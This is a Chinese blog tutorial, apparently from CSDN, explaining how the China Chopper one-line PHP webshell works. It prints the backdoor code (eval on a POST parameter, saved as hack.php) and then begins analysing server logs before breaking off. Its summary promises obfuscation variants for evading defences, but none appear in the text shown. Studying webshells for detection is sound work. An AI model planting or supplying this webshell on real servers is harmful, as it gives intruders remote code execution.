中国菜刀php一句话,中国菜刀之写一句话木马变形

本文详细介绍了中国菜刀php一句话木马的工作原理,包括服务端和客户端的交互,以及如何通过HTTP日志分析其行为。此外,还讨论了一句话脚本的三种变形方法,包括加密、变量拼接和加密拼接,并提供了实验步骤来模拟绕过安全防护的场景。
摘要由CSDN通过智能技术生成

了解一句话脚本的工作原理

一句话脚本的工作原理:

一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)

一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改

一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行.

我们尝试抓取http日志来剖析菜刀技术原理:

在上述试验中,我们最开始连接的hack.php的代码如下:1

2

3<?php

eval ($_POST['pass']);

?>

在PHP的代码中:eva() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

在我们通过中国菜刀进行文件管理的时候,系统在做什么呢?

在这里我们需要查看系统的日志进行查找答案(1) 查看系统日志

(2)重新使用菜刀的文件管理功能抓取日志

我们在中国菜刀中重新使用文件管理的功能,其后服务器端产生了日志信息。

服务器端产生了如下日志信息(以下数据为服务器端日志数据,在实验环境中无法查看,仅作理论参考):1172.16.11.2 - -

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值